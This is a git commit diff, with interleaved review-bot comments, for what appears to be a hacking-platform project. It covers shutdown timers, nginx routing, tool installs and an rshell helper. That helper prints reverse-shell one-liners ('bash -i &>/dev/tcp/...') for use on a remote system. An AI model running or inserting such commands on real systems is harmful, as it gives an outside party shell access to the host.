guest docker bumping
parent
fc10201e80
commit
44f0018fff
|
@ -1,7 +1,10 @@
|
|||
0.5.4 - 2023-02-00
|
||||
* OpenSSH 9.6p1
|
||||
* rshell
|
||||
* sploitscan
|
||||
* OpenVPN (curl sf/vpn)
|
||||
* OpenVPN (curl sf/ovpn)
|
||||
* Different auto-shutdown timers for FREE and TOKEN users
|
||||
* Syscop login message after auto-shutdown
|
||||
|
||||
0.5.2 - 2023-12-00
|
||||
* Kali 2023.4
|
||||
|
|
4
Makefile
4
Makefile
|
@ -119,6 +119,7 @@ FILES_PROVISION += "segfault-$(VER)/provision/update.sh"
|
|||
FILES_ENCFSD += "segfault-$(VER)/encfsd/Makefile"
|
||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/Dockerfile"
|
||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/destructor.sh"
|
||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/funcs_destructor.sh"
|
||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/encfsd.sh"
|
||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/portd.sh"
|
||||
|
||||
|
@ -137,6 +138,7 @@ FILES_GSNC += "segfault-$(VER)/gsnc/sf-gsnc.sh"
|
|||
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx.conf"
|
||||
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx-rpc.conf"
|
||||
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/sf.conf"
|
||||
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/timers.conf"
|
||||
FILES_CONFIG += "segfault-$(VER)/config/etc/redis/redis.conf"
|
||||
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/WARNING---SHARED-BETWEEN-ALL-SERVERS---README.txt"
|
||||
FILES_CONFIG += "segfault-$(VER)/config/etc/resolv.conf"
|
||||
|
@ -156,7 +158,7 @@ FILES_ROOT += "segfault-$(VER)/sfbin/funcs.sh"
|
|||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_redis.sh"
|
||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_admin.sh"
|
||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_net.sh"
|
||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_vpn.sh"
|
||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_ovpn.sh"
|
||||
FILES_ROOT += "segfault-$(VER)/sfbin/ovpn_up.sh"
|
||||
FILES_ROOT += "segfault-$(VER)/sfbin/sf"
|
||||
FILES_ROOT += "segfault-$(VER)/sfbin/banhammer.sh"
|
||||
|
|
|
@ -69,13 +69,15 @@ http {
|
|||
gzip off;
|
||||
|
||||
location / {
|
||||
try_files $uri $uri/ = 404;
|
||||
rewrite /net /net/;
|
||||
rewrite /vpn /vpn/;
|
||||
rewrite /wg /wg/;
|
||||
rewrite /dmesg /dmesg/;
|
||||
rewrite /port /port/;
|
||||
rewrite /set /set/;
|
||||
#try_files $uri $uri/ = 404;
|
||||
rewrite ^/net$ /net/ last;
|
||||
rewrite ^/ovpn$ /ovpn/ last;
|
||||
rewrite ^/vpn$ /ovpn/ last;
|
||||
rewrite ^/wg$ /wg/ last;
|
||||
rewrite ^/dmesg$ /dmesg/ last;
|
||||
rewrite ^/port$ /port/ last;
|
||||
rewrite ^/set$ /set/ last;
|
||||
rewrite ^/vpn/(.*)$ /ovpn/$1 last;
|
||||
|
||||
location ~* ^/set/.* {
|
||||
fastcgi_param REMOTE_ADDR $remote_addr;
|
||||
|
@ -101,11 +103,11 @@ http {
|
|||
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
|
||||
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
|
||||
}
|
||||
location ~* ^/vpn/.* {
|
||||
location ~* ^/ovpn/.* {
|
||||
fastcgi_param REMOTE_ADDR $remote_addr;
|
||||
fastcgi_param REQUEST_URI $request_uri;
|
||||
fastcgi_param REQUEST_BODY $request_body;
|
||||
fastcgi_param FCGI_CMD vpn;
|
||||
fastcgi_param FCGI_CMD ovpn;
|
||||
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
|
||||
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
|
||||
}
|
||||
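Review bot: `#try_files $uri $uri/ = 404;` leaves a commented-out directive in `location /` with no explanation, so the next reader cannot tell whether it was dropped because it broke the rewrites or only temporarily. If it is gone for good it should be deleted; if the intent was the `=404` form, note that the spelling with a space makes nginx read `=` as a file to try and `404` as the fallback URI rather than a status code (inferred from the directive syntax, not tested here). The anchored `rewrite ^/net$ /net/ last;` family is a clear improvement over the unanchored `rewrite /net /net/;` it replaces, and the `/vpn` → `/ovpn` aliases here match the renamed `location ~* ^/ovpn/.*` in the second hunk. A one-line comment above the two `/vpn` rewrites, `# /vpn kept as an alias for /ovpn — presumably for existing clients, confirm before removing`, would record why both spellings exist.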
|
|
|
@ -0,0 +1,6 @@
|
|||
#SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
|
||||
#SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
|
||||
#SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
|
||||
#SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
|
||||
|
||||
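Review bot: The new `timers.conf` has no header saying what it is, and since the encfsd destructor `source`s it with bash, a reader could reasonably add non-shell syntax that would break the daemon's loop. Two header lines such as `# Sourced by bash (encfsd destructor) every 30 s: plain VAR=value assignments only.` and `# Values are seconds; the TOKEN_* pair applies to servers that have a token, the others to FREE servers.` would say enough. It should also mention that, as the destructor is written, restoring a default currently requires restarting encfsd rather than just deleting the line.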
|
|
@ -40,7 +40,7 @@ services:
|
|||
devices:
|
||||
- "/dev/fuse:/dev/fuse"
|
||||
volumes:
|
||||
- "${SF_BASEDIR:-.}/config/db:/config/db:ro"
|
||||
- "${SF_BASEDIR:-.}/config/db:/config/db:rw"
|
||||
- "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
|
||||
- "${SF_BASEDIR:-.}/data:/encfs/raw"
|
||||
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
|
||||
|
@ -76,6 +76,7 @@ services:
|
|||
- "/dev/fuse:/dev/fuse"
|
||||
volumes:
|
||||
- "${SF_BASEDIR:-.}/config/db:/config/db:ro"
|
||||
- "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
|
||||
- "${SF_BASEDIR:-.}/data:/encfs/raw"
|
||||
- "${SF_SHMDIR:-/dev/shm/sf}/self-for-guest:/config/self-for-guest"
|
||||
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
|
||||
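Review bot: Widening the `config/db` bind mount from `:ro` to `:rw` in the first hunk gives that service write access to the whole user database, while the only new writer visible in this commit is the syscop message file under `/config/db/user/lg-*/`; the service name sits outside the hunk, so which container gains the access is inferred. If the write is only needed for that file, a narrower mount of the user subtree would limit the blast radius of a bug in the destructor, which already runs `rm -rf` on per-user paths. At minimum a comment on the volume line, `# rw: destructor writes syscop-msg.txt into /config/db/user/lg-*/`, records why read-only was dropped.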
|
|
|
@ -9,4 +9,4 @@ RUN apk add --no-cache --upgrade \
|
|||
encfs \
|
||||
redis \
|
||||
xfsprogs-extra
|
||||
COPY destructor.sh encfsd.sh portd.sh /
|
||||
COPY destructor.sh funcs_destructor.sh encfsd.sh portd.sh /
|
||||
|
|
|
@ -3,149 +3,28 @@
|
|||
# shellcheck disable=SC1091 # Do not follow
|
||||
source /sf/bin/funcs.sh
|
||||
source /sf/bin/funcs_redis.sh
|
||||
|
||||
SF_TIMEOUT_WITH_SHELL=604800
|
||||
SF_TIMEOUT_NO_SHELL=129600
|
||||
|
||||
# Defaults
|
||||
SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
|
||||
SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
|
||||
SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
|
||||
SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
|
||||
[[ -n $SF_DEBUG ]] && {
|
||||
SF_TIMEOUT_WITH_SHELL=180
|
||||
SF_TIMEOUT_NO_SHELL=120
|
||||
}
|
||||
|
||||
# [LID] <1=encfs> <1=Container> <message>
|
||||
# Either parameter can be "" to not stop encfs or lg-container
|
||||
stop_lg()
|
||||
{
|
||||
local is_encfs
|
||||
local is_container
|
||||
local lid
|
||||
local ts_born
|
||||
lid="$1"
|
||||
ts_born="$2"
|
||||
is_encfs="$3"
|
||||
is_container="$4"
|
||||
|
||||
LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
|
||||
|
||||
red RPUSH portd:cmd "remport ${lid}" >/dev/null
|
||||
rm -f "/sf/run/encfsd/user/lg-${lid}"
|
||||
rm -f "/sf/run/pids/lg-${lid}.pid"
|
||||
rm -f "/sf/run/ips/lg-${lid}.ip"
|
||||
rm -rf "/config/self-for-guest/lg-${lid}"
|
||||
rm -rf "/sf/run/users/lg-${lid}"
|
||||
|
||||
# Kill the OpenVPN process (if running)
|
||||
docker exec sf-master killall "openvpn-$lid" 2>/dev/null
|
||||
docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null
|
||||
|
||||
# Tear down container
|
||||
[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
|
||||
|
||||
# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
|
||||
# inside the container even that we never moved it into the container's
|
||||
# Process Namespace. EncFS will also die when the lg- is shut down.
|
||||
# This is only neede for cgroup1:
|
||||
[[ -n $is_encfs ]] && {
|
||||
pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
|
||||
# Give kernel time to unmount mountpoint
|
||||
sleep 1
|
||||
}
|
||||
# Do not use 'rm -rf' here as this might still be a mounted drive
|
||||
# when encfsd is not killed fast enough (failing to delete is acceptable).
|
||||
rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
|
||||
rmdir "/encfs/sec/lg-${lid}"
|
||||
}
|
||||
|
||||
# [lg-$LID]
|
||||
# Check if lg- is running and
|
||||
# 1. EncFS died
|
||||
# 2. Container should be stopped (stale, idle)
|
||||
check_container()
|
||||
{
|
||||
local c
|
||||
local lid
|
||||
local i
|
||||
local IFS
|
||||
local fn
|
||||
local comm
|
||||
local ts_logout
|
||||
local ts_born
|
||||
IFS=$'\n'
|
||||
|
||||
c="$1"
|
||||
lid="${c#lg-}"
|
||||
|
||||
[[ ${#lid} -ne 10 ]] && return
|
||||
|
||||
ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
|
||||
# Skip if EncFS only started recently (zsh not yet started).
|
||||
[[ $((NOW - ts_born)) -lt 20 ]] && return 0
|
||||
|
||||
# Check if EncFS is still running.
|
||||
pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
|
||||
# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
|
||||
stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
|
||||
return
|
||||
}
|
||||
|
||||
# ts_logout may not exist (stale)
|
||||
ts_logout=0
|
||||
fn="/config/db/user/lg-${lid}/ts_logout"
|
||||
[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn")
|
||||
|
||||
# Check if there is still a shell running inside the container:
|
||||
IFS=""
|
||||
set -o pipefail
|
||||
comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
|
||||
# HERE: lg died or top failed.
|
||||
set +o pipefail
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
|
||||
return
|
||||
}
|
||||
set +o pipefail
|
||||
# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
|
||||
# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
|
||||
# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
|
||||
|
||||
# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
||||
# FIXME: many stale is_logged_in exists without ssh connected ;/
|
||||
|
||||
# HERE: LG & EncFS are running.
|
||||
echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
|
||||
# HERE: User still has shell running
|
||||
[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
||||
[[ $((NOW - ts_logout)) -lt ${SF_TIMEOUT_WITH_SHELL} ]] && return
|
||||
# HERE: Not logged in. logged out more than 1 week ago.
|
||||
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
|
||||
return
|
||||
}
|
||||
# HERE: No shell running, ts_logout=0 if never logged out
|
||||
|
||||
# Skip if only recently logged out.
|
||||
[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
|
||||
|
||||
# Filter out stale processes
|
||||
echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
|
||||
# HERE: Nothing running but stale processes
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
|
||||
return
|
||||
}
|
||||
# HERE: Something running (but no shell, and no known processes)
|
||||
|
||||
[[ $((NOW - ts_logout)) -ge ${SF_TIMEOUT_NO_SHELL} ]] && {
|
||||
# User logged out 1.5 days ago. No shell. No known processes.
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${SF_TIMEOUT_NO_SHELL}sec (no shell running)."
|
||||
return
|
||||
}
|
||||
|
||||
# HERE: No shell. No known processes. Less than 1.5 days ago.
|
||||
SF_TIMEOUT_WITH_SHELL=60
|
||||
SF_TIMEOUT_NO_SHELL=15
|
||||
SF_TIMEOUT_TOKEN_WITH_SHELL=120
|
||||
SF_TIMEOUT_TOKEN_NO_SHELL=90
|
||||
}
|
||||
|
||||
[[ ! -S /var/run/docker.sock ]] && ERREXIT 255 "Not found: /var/run/docker.sock"
|
||||
source /funcs_destructor.sh || ERREXIT 255
|
||||
|
||||
export REDISCLI_AUTH="${SF_REDIS_AUTH}"
|
||||
|
||||
while :; do
|
||||
sleep 30
|
||||
source /config/etc/sf/timers.conf 2>/dev/null
|
||||
source /funcs_destructor.sh 2>/dev/null
|
||||
NOW=$(date +%s)
|
||||
# Every 30 seconds check all container we are tracking (from encfsd)
|
||||
containers=($(cd /sf/run/encfsd/user && echo lg-*))
|
||||
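Review bot: The four `SF_TIMEOUT_*` defaults are assigned once before the loop, but `/config/etc/sf/timers.conf` is re-sourced every 30 s, so an override that is later removed from the file stays in effect until encfsd restarts and editing the config cannot bring a default back. Re-applying the defaults at the top of each iteration, immediately before the `source`, makes the file the single source of truth; a sketch is below. The re-`source` of `/funcs_destructor.sh` inside the loop also discards stderr, so a syntax error introduced while editing that file could silently leave a mix of old and new function definitions; `|| ERR "funcs_destructor.sh failed to load"` would make that visible. The enclosing `while` loop continues past the end of the hunk.
```shell
# Defaults (seconds). Re-applied every cycle so that deleting a line from
# timers.conf reverts to the default without restarting encfsd.
set_default_timers() {
	SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
	SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
	SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
	SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
	[[ -n $SF_DEBUG ]] && {
		SF_TIMEOUT_WITH_SHELL=60
		SF_TIMEOUT_NO_SHELL=15
		SF_TIMEOUT_TOKEN_WITH_SHELL=120
		SF_TIMEOUT_TOKEN_NO_SHELL=90
	}
	return 0
}
# … unchanged: docker.sock check, initial source of /funcs_destructor.sh, REDISCLI_AUTH export …
while :; do
	sleep 30
	set_default_timers
	source /config/etc/sf/timers.conf 2>/dev/null
	source /funcs_destructor.sh 2>/dev/null || ERR "funcs_destructor.sh failed to load"
	# … unchanged: NOW, container scan …
```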
|
|
|
@ -0,0 +1,153 @@
|
|||
|
||||
# [LID] <1=encfs> <1=Container> <message>
|
||||
# Either parameter can be "" to not stop encfs or lg-container
|
||||
stop_lg()
|
||||
{
|
||||
local is_encfs
|
||||
local is_container
|
||||
local lid
|
||||
local ts_born
|
||||
lid="$1"
|
||||
ts_born="$2"
|
||||
is_encfs="$3"
|
||||
is_container="$4"
|
||||
|
||||
LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
|
||||
|
||||
red RPUSH portd:cmd "remport ${lid}" >/dev/null
|
||||
rm -f "/sf/run/encfsd/user/lg-${lid}"
|
||||
rm -f "/sf/run/pids/lg-${lid}.pid"
|
||||
rm -f "/sf/run/ips/lg-${lid}.ip"
|
||||
rm -rf "/config/self-for-guest/lg-${lid}"
|
||||
rm -rf "/sf/run/users/lg-${lid}"
|
||||
|
||||
# Kill the OpenVPN process (if running)
|
||||
docker exec sf-master killall "openvpn-$lid" 2>/dev/null
|
||||
docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null
|
||||
|
||||
# Tear down container
|
||||
[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
|
||||
|
||||
# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
|
||||
# inside the container even that we never moved it into the container's
|
||||
# Process Namespace. EncFS will also die when the lg- is shut down.
|
||||
# This is only neede for cgroup1:
|
||||
[[ -n $is_encfs ]] && {
|
||||
pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
|
||||
# Give kernel time to unmount mountpoint
|
||||
sleep 1
|
||||
}
|
||||
# Do not use 'rm -rf' here as this might still be a mounted drive
|
||||
# when encfsd is not killed fast enough (failing to delete is acceptable).
|
||||
rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
|
||||
rmdir "/encfs/sec/lg-${lid}"
|
||||
}
|
||||
|
||||
try_syscop_msg() {
|
||||
local lid="$1"
|
||||
echo -en "\
|
||||
🤷♂️ ${CDM}Your server shut down automatically because you did not log in for $(( (NOW - ts_logout) / 60 / 60 )) h.
|
||||
🫵 Please type ${CDC}halt${CDM} to stop your server or...
|
||||
❤️ ...get a ${CM}TOKEN${CDM} to stop this message: ${CUL}${CB}https://thc.org/sf/token${CN}${CDM}
|
||||
|
||||
🌈 ${CW}Yours sincerely, The SysCops 😘 ${CN}
|
||||
">"/config/db/user/lg-${lid:?}/syscop-msg.txt"
|
||||
}
|
||||
|
||||
# [lg-$LID]
|
||||
# Check if lg- is running and
|
||||
# 1. EncFS died
|
||||
# 2. Container should be stopped (stale, idle)
|
||||
check_container()
|
||||
{
|
||||
local c
|
||||
local lid
|
||||
local IFS=$'\n'
|
||||
local fn
|
||||
local comm
|
||||
local ts_logout
|
||||
local ts_born
|
||||
local to_with_shell=$SF_TIMEOUT_WITH_SHELL
|
||||
local to_no_shell=$SF_TIMEOUT_NO_SHELL
|
||||
local is_token
|
||||
|
||||
c="$1"
|
||||
lid="${c#lg-}"
|
||||
|
||||
[[ ${#lid} -ne 10 ]] && return
|
||||
|
||||
ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
|
||||
# Skip if EncFS only started recently (zsh not yet started).
|
||||
[[ $((NOW - ts_born)) -lt 20 ]] && return 0
|
||||
|
||||
# Check if EncFS is still running.
|
||||
pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
|
||||
# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
|
||||
stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
|
||||
return
|
||||
}
|
||||
|
||||
# ts_logout may not exist (stale)
|
||||
ts_logout=0
|
||||
fn="/config/db/user/lg-${lid}/ts_logout"
|
||||
[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn")
|
||||
|
||||
# Check if there is still a shell running inside the container:
|
||||
IFS=""
|
||||
set -o pipefail
|
||||
comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
|
||||
# HERE: lg died or top failed.
|
||||
set +o pipefail
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
|
||||
return
|
||||
}
|
||||
|
||||
# Load timers
|
||||
[[ -e "/config/db/user/lg-${lid}/token" ]] && {
|
||||
to_with_shell=$SF_TIMEOUT_TOKEN_WITH_SHELL
|
||||
to_no_shell=$SF_TIMEOUT_TOKEN_NO_SHELL
|
||||
is_token=1
|
||||
}
|
||||
set +o pipefail
|
||||
# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
|
||||
# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
|
||||
# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
|
||||
|
||||
# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
||||
# FIXME: many stale is_logged_in exists without ssh connected ;/
|
||||
|
||||
# HERE: LG & EncFS are running.
|
||||
echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
|
||||
# HERE: User still has shell running
|
||||
[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
||||
[[ $((NOW - ts_logout)) -lt ${to_with_shell} ]] && return
|
||||
# HERE: Not logged in. logged out more than 1 week ago.
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
|
||||
[[ -z $is_token ]] && try_syscop_msg "$lid"
|
||||
|
||||
return
|
||||
}
|
||||
# HERE: No shell running, ts_logout=0 if never logged out
|
||||
|
||||
# Skip if only recently logged out.
|
||||
[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
|
||||
|
||||
# Filter out stale processes
|
||||
echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
|
||||
# HERE: Nothing running but stale processes
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
|
||||
return
|
||||
}
|
||||
# HERE: Something running (but no shell, and no known processes)
|
||||
|
||||
[[ $((NOW - ts_logout)) -ge ${to_no_shell} ]] && {
|
||||
# User logged out 1.5 days ago. No shell. No known processes.
|
||||
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${to_no_shell}sec (no shell running)."
|
||||
[[ -z $is_token ]] && try_syscop_msg "$lid"
|
||||
|
||||
return
|
||||
}
|
||||
|
||||
# HERE: No shell. No known processes. Less than 1.5 days ago.
|
||||
}
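Review bot: `[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill` in stop_lg redirects to a misspelled path, so the output is written to a file named `/dev/nuill` (or the redirect fails) instead of being discarded; it should read `&>/dev/null`. `try_syscop_msg` also reads `ts_logout` and `NOW`, which are not its parameters — it only works because it is called from `check_container`, where `ts_logout` is a local — so passing the idle time explicitly, `try_syscop_msg "$lid" "$((NOW - ts_logout))"`, makes the dependency visible and keeps the function usable elsewhere. The process names in `$comm` are reported from inside the guest container and are therefore guest-controlled; the code only uses them for classification via fixed regexes, which is fine, but a comment on the `comm=$(docker top ...)` line, `# comm is guest-supplied: match against it only, never pass it to a shell`, would keep it that way.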
|
|
@ -614,11 +614,11 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
|
|||
&& /pkg-install.sh HACK ghbin 'theaog/spirit' 'spirit%arch:x86_64=:DEFAULT=SKIP%.tgz$' spirit `# x86_64 only, spirit-arm bad` \
|
||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/gf@latest \
|
||||
&& mkdir -p /usr/share/gf \
|
||||
&& svn export https://github.com/tomnomnom/gf/trunk /tmp/gf \
|
||||
&& git clone --depth 1 https://github.com/tomnomnom/gf.git /tmp/gf \
|
||||
&& mv /tmp/gf/examples/*.json /usr/share/gf \
|
||||
&& mv /tmp/gf/gf-completion.* /usr/share/gf \
|
||||
&& rm -rf /tmp/gf \
|
||||
&& svn export https://github.com/1ndianl33t/Gf-Patterns/trunk/ /tmp/gf \
|
||||
&& git clone --depth 1 https://github.com/1ndianl33t/Gf-Patterns.git /tmp/gf \
|
||||
&& mv /tmp/gf/*.json /usr/share/gf; }' \
|
||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/hacks/inscope@latest; }' \
|
||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/Emoe/kxss@latest; }' \
|
||||
|
@ -631,7 +631,8 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
|
|||
&& cmake . \
|
||||
&& make \
|
||||
&& cp urldedupe /usr/bin; }' \
|
||||
&& /pkg-install.sh HACK bash -c '{ svn export https://github.com/urbanadventurer/username-anarchy/trunk /opt/username-anarchy; }' \
|
||||
&& /pkg-install.sh HACK bash -c '{ git clone --depth 1 https://github.com/urbanadventurer/username-anarchy.git /opt/username-anarchy \
|
||||
&& rm -rf /opt/username-anarchy/.git*; }' \
|
||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/damit5/gitdorks_go@latest; }' \
|
||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/dsieve@master; }' \
|
||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/enumerepo@latest; }' \
|
||||
|
@ -802,8 +803,8 @@ RUN /pkg-install.sh HACK ghbin ekzhang/bore '%arch:aarch64=arm%-unknown-linux'
|
|||
&& /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb' `# x86_64 only` \
|
||||
&& /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py' sploitscan \
|
||||
&& /pkg-install.sh HACK ghbin hueristiq/xurlfind3r 'linux_%arch:x86_64=amd64:aarch64=arm64%' xurlfind3r
|
||||
RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker \
|
||||
&& /pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb'
|
||||
RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker
|
||||
## YANKED. Already in apt-get install powershell/pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb'
|
||||
RUN /pkg-install.sh HACK bash -c '{ wget -O "/usr/bin/favfreak.py" https://raw.githubusercontent.com/devanshbatham/FavFreak/master/favfreak.py \
|
||||
&& chmod 755 /usr/bin/favfreak.py \
|
||||
&& ln -s favfreak.py /usr/bin/FavFreak; }' \
|
||||
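Review bot: `/pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py' sploitscan` fetches a script from the tip of a branch at image build time, so the image content changes whenever upstream pushes and a compromised or force-pushed branch ends up executable in every guest; pin it to a release tag or commit (`.../raw/<PINNED_COMMIT>/sploitscan.py`) and ideally compare it against a recorded checksum. The `git clone --depth 1` lines that replace `svn export` in the gf, Gf-Patterns and username-anarchy hunks have the same property (as the trunk exports did before them) and could take `--branch <PINNED_TAG>` so that `--no-cache` rebuilds stay reproducible. The surrounding `RUN` instructions start and end outside the hunks.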
|
|
|
@ -293,8 +293,10 @@ alias nocol=noansi
|
|||
# Make the Project name visibile in the PS1 prompt
|
||||
[[ -z $VIRTUAL_ENV ]] && VIRTUAL_ENV="${SF_PRJ}"
|
||||
|
||||
PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:$PATH"
|
||||
|
||||
PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:/usr/local/go/bin:$PATH"
|
||||
[[ -d /usr/share/doc/python3-impacket/examples ]] && PATH="${PATH}:/usr/share/doc/python3-impacket/examples"
|
||||
export PATH
|
||||
|
||||
_sf_info_non_perm()
|
||||
{
|
||||
|
|
|
@ -16,31 +16,31 @@ ERREXIT() {
|
|||
exit "${code:-99}"
|
||||
}
|
||||
|
||||
[[ ! -f /config/self/reverse_port ]] && curl sf/port
|
||||
load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
|
||||
load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
|
||||
echo -e "\
|
||||
Use any of these commands on the remote system:${CDR}
|
||||
bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'
|
||||
(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &
|
||||
${CN}
|
||||
Once connected, cut & paste this into the remote shell:${CDC}
|
||||
Use one of these commands on the remote system:
|
||||
1. ${CDR}bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'${CN}
|
||||
2. ${CDR}(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &${CN}
|
||||
${CN}Once connected, cut & paste the following into the _this_ shell:
|
||||
${CF}-------------------------------------------------------------------------------${CDC}
|
||||
command -v python >/dev/null \\
|
||||
&& exec python -c 'import pty; pty.spawn(\"bash\")' \\
|
||||
|| exec script -qc bash /dev/null
|
||||
|
||||
